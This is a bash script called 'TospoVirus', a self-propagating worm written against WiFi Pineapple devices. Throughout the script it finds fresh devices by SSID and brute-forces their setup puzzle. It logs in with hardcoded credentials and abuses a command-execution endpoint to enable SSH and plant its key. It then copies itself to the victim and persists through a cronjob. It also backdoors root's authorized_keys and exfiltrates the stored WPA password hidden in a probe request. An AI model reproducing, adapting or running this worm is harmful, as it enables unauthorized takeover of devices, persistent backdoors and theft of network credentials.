tv

1. #!/bin/bash
2. #TospoVirus: Weaponizing vulnerabilities for fun and... just fun.
3. #Author:
4. #   twitter @catatonicprime
5. #   email (guess)
6. #
7. #n00b comments provided by:
8. #   ActualReverend
9.  
10. WHITELIST="Pineapple5_50E7|Pineapple5_120D"
11.  
12. #Setup some constants, note: token must be the sha1 of sessid, do not rely on openssl being available on the remote device
13. creds="username=root&password=pineapplesareyummy&login="
14. sessid="tospovirus"
15. token="_csrfToken=a6f6832ff4df61608bf3e38b4facc7550e42244d"
16. sshoptions="-oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i /tospo/tospo_rsa"
17.  
18. #Get a copy of our SSID which we'll black list so we don't do something silly like try to infect ourselves
19. self=`uci get wireless.@wifi-iface[0].ssid`
20.  
21. init() {
22.     #Mark the device as being pwn3d.
23.     #looks for factory default SSID without a space
24.     if grep -q "\"\$6[^\"]" /lib/wifi/mac80211.sh;
25.     then
26.         #add space in SSID to signal it has been infected
27.         sed -i -e 's/"\$6/"$6" "/' /lib/wifi/mac80211.sh
28.         uci set wireless.@wifi-iface[0].ssid="$(uci get wireless.@wifi-iface[0].ssid) "
29.         uci commit
30.         wifi
31.         sleep 3
32.     fi
33.     #Make ourselves a key we'll use for all our children.
34.     if [ ! -f /tospo/tospo_rsa.pub ]; then
35.         echo "Generating tospo ssh key..."
36.         #We use the smallest possible key for quickness of generating and transmission
37.         ssh-keygen -b 768 -f /tospo/tospo_rsa -N ""
38.     fi
39.     #Backdoor this machine with the master key if it hasn't already been backdoored.
40.     mkdir -p /root/.ssh
41.     touch /root/.ssh/authorized_keys
42.     grep -q "$(cat /tospo/tvbd.pub)" /root/.ssh/authorized_keys || cat /tospo/tvbd.pub >> /root/.ssh/authorized_keys
43. }
44.  
45. #Function used for storing current networking state. This state includes:
46. #  The current SSID this device is connected to
47. #  The password for that SSID
48. #  This device's IP address
49. #  Etc.
50. #The reverse of this is popstate (see below).
51. pushstate() {
52.     echo "Pushing state..."
53.     uci export wireless > /tospo/w
54.     uci export network > /tospo/n
55. }
56.  
57. #Function used to restore a previous networking state, stored when calling pushstate
58. #Note: This causes the networking to drop for a moment.
59. popstate() {
60.     echo "Popping state..."
61.     #Bring the bridge back up
62.     ifconfig br-lan 172.16.42.1 up
63.     #Bring the wirelss access point radio back up
64.     ifconfig wlan0 up
65.     #Nuke the wireless client radio and take it back down
66.     #TODO: This should restore to a previous value if possible.
67.     ifconfig wlan1 0.0.0.0 && ifconfig wlan1 down
68.     #Import all of the previously stored wireless data and commit it.
69.     uci import -f /tospo/w && uci commit
70.     uci import -f /tospo/n && uci commit
71.     #Reloads the wifi, reupping DHCP etc. as necessary.
72.     wifi
73. }
74.  
75. #Function used to connect to another network.
76. # $1 is the ssid of the network to connect to.
77. connect() {
78.     ssid=$1
79.     #Inform the user that we're connecting to the network.
80.     echo "Connecting to $ssid..."
81.     #Wake up the client mode radio.
82.     ifconfig wlan1 up
83.     #Inform the user that we're attempting to avoid IP conflicts.
84.     echo "Avoiding conflicts..."
85.     #Make a note about a thing we'd like to do in the future.
86.     #TODO: Store this value to better preserve state for custom configurations
87.     #Take the bridge down and reassign to a separate IP to avoid conflicting with the victim gateway
88.     ifconfig br-lan 172.16.42.191 down
89.     #Take the access point radio down - this is down for about 20 seconds in my experience
90.     ifconfig wlan0 down
91.  
92.     #The following is a comment about informing the user of what the script is doing.
93.     #Inform the user that we're trying to derive which interface is the one we want to use for connecting in client mode
94.     echo "Guess at the client-mode interface..."
95.     #Taking a guess at what interface can be used for client mode.
96.     wid=$(uci show wireless | grep "wireless.@wifi-iface\[[0-9]\].device=radio1" | cut -d'[' -f 2 | cut -d']' -f 1)
97.     #Inform the user that we're going to ditch encryption keys (fresh pineapples are *always* unencrypted)
98.     echo "Stripping keys just in case..."
99.     #Ditch the keys/encryption
100.     uci delete wireless.@wifi-iface[$wid].key
101.     uci delete wireless.@wifi-iface[$wid].encryption
102.     #Configure the various settings with defaults for a fresh pineapple configuration
103.     echo "Connect to the target network..."
104.     uci set wireless.@wifi-iface[$wid].network=wan
105.     uci set wireless.@wifi-iface[$wid].mode=sta
106.     uci set wireless.@wifi-iface[$wid].ssid="$ssid"
107.     uci set wireless.@wifi-iface[$wid].hidden=0
108.     uci set wireless.radio1.channel=11
109.     #Commit all of our changes
110.     uci commit wireless
111.     #Reload the wifi, this'll connect etc.
112.     wifi
113.     #Take a nap - this is so the client mode has a little bit of time to pull a new IP.
114.     sleep 3
115.     #Forget about the IP just use this one.
116.    
117.     #TODO: Disable pulling with DHCP if possible?
118.     ifconfig wlan1 172.16.42.146
119. }
120.  
121.  
122. #Function used to perform an HTTP post to the gateway 172.16.42.1 on port 1471
123. # $1 - Resource to post to
124. # $2 - Post Data  
125. # $3 - Session ID
126. #An HTTP post looks like this:
127. #   POST /some/page.php HTTP/1.1
128. #   Host: 172.16.42.1:1471
129. #   Content-Type: application/x-www-form-urlencoded
130. #   Cookie: PHPSESSID=tospovirus|[somesessid]
131. #   Content-Length: len(data)
132. #   Connection: close
133. #
134. #   data=goes&here=true
135. post() {
136.     len=`printf "$2" | wc -c`
137.     printf "POST $1 HTTP/1.1\r\nHost: 172.16.42.1:1471\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: PHPSESSID=$3\r\nContent-Length: $len\r\nConnection: close\r\n\r\n$2" | nc 172.16.42.1 1471
138. }
139.  
140. #Function solves the LED puzzle
141. bf() {
142.     echo "Brute forcing..."
143.     session=`printf 'HEAD /?action=verify_pineapple HTTP/1.1\nHost: 172.16.42.1:1471\nConnection: close\n\n' | nc 172.16.42.1 1471 | egrep -om1 '[0-9a-z]{32}'`
144.     for n in `seq 1 $1`
145.     do
146.         echo "Trying $n time..."
147.         #change the puzzle until it matches our solution, which is all lights on.  "Kobayashi Maru"
148.             post "/?action=verify_pineapple" "green=on&amber=on&blue=on&red=on&verify_pineapple=Continue" "$session" | grep "password" && post "/?action=set_password" "password=pineapplesareyummy&password2=pineapplesareyummy&eula=1&sw_license=1&set_password=Set+Password" "$session" | grep "success" && return 0
149.     done
150.     #return 1 - Failed!
151.     return 1
152. }
153. #Function uses the post function to login for this session "tospovirus" which is the default session
154. #Once logged in other actions may be performed.
155. login() {
156.     echo "Logging in..."
157.     post '/includes/api/login.php' "$creds" "$sessid" | grep -i 'invalid username' && return 1
158.     echo "Logged in Successfully!"
159.     #return 0 - Succeeded!
160.     return 0
161. }
162.  
163. #Function uses post function to execute commands on the victim. This is the heart and soul.
164. #This function requires this session to already be logged in.
165. infect() {
166.     #Ensure that /root/.ssh exists on the remote, then dump our generated ssh key on into
167.     #the authorized_keys file. Then we turn on SSH, this will grant us access/ability to
168.     #use ssh commands to copy ourselves to the victim and execute commands.
169.     #If the \\ scare you - don't touch them.
170.     post '/components/system/configuration/functions.php?execute=' "$token&commands=/etc/init.d/sshd enable;/etc/init.d/sshd start;mkdir /root/.ssh; printf \"\$(echo $(hexdump -e'16/1 "%02x"' /tospo/tospo_rsa.pub)|sed -e's/\\(..\\)/\\\\\\\\x\\\\1/g')\">>/root/.ssh/authorized_keys" "$sessid"
171.     #use SSH to create the /tospo directory, then copy only desired files into it.
172.     #This is where we successfully clone ourselves to the victim. The various -o Options
173.     #are to avoid blocking errors which would require user-interaction. We want to simply
174.     #ignore these options and so we decline or use /dev/null for file storage.
175.     ssh $sshoptions 172.16.42.1 "mkdir -p /tospo" && scp $sshoptions -r /tospo/tv* 172.16.42.1:/tospo/
176. }
177.  
178. #Function used to execute SSH commands on the remote in order to establish future runtime
179. #This installs the service, cronjob, etc. We try to do this only once on infection
180. persist() {
181.     ssh $sshoptions 172.16.42.1 'printf "* * * * * /tospo/tv" | crontab -'
182. }
183.  
184. #Function used to disclosure private WPA management data (read: password) using semi-secure RSA keys
185. #Novel in that we use a PROBE request to do so - appearing like garbage to onlookers.
186. exfiltrate() {
187.     #Confirm we have openssl first... then scoop out the password if possible.
188.     #TODO: Be more specific about *which* key we pull out. Maybe there is more than one?
189.     which openssl && iwlist wlan0 scan essid "$(cat /etc/config/wireless | grep "key" | cut -d"'" -f2 | openssl rsautl -encrypt -pubin -inkey /tospo/tvd.pub)" >/dev/null
190. }
191.  
192. #Run the virus...
193. init
194. echo "Scanning for new devices..."
195. for net in `iwlist wlan0 scan | egrep "ESSID:\"($WHITELIST)[^ ]" | grep -v "$self"`
196. do
197.     pushstate
198.     connect `echo $net | cut -d '"' -f 2`
199.     #Login - if this fails, brute force then login, if that fails, bail out this one is a no-winner.
200.     #TODO: Generate a blacklist and blacklist this device?
201.     login || (bf 75 && login || popstate && break)
202.     infect
203.     persist
204.     popstate
205.     break
206. done
207. exfiltrate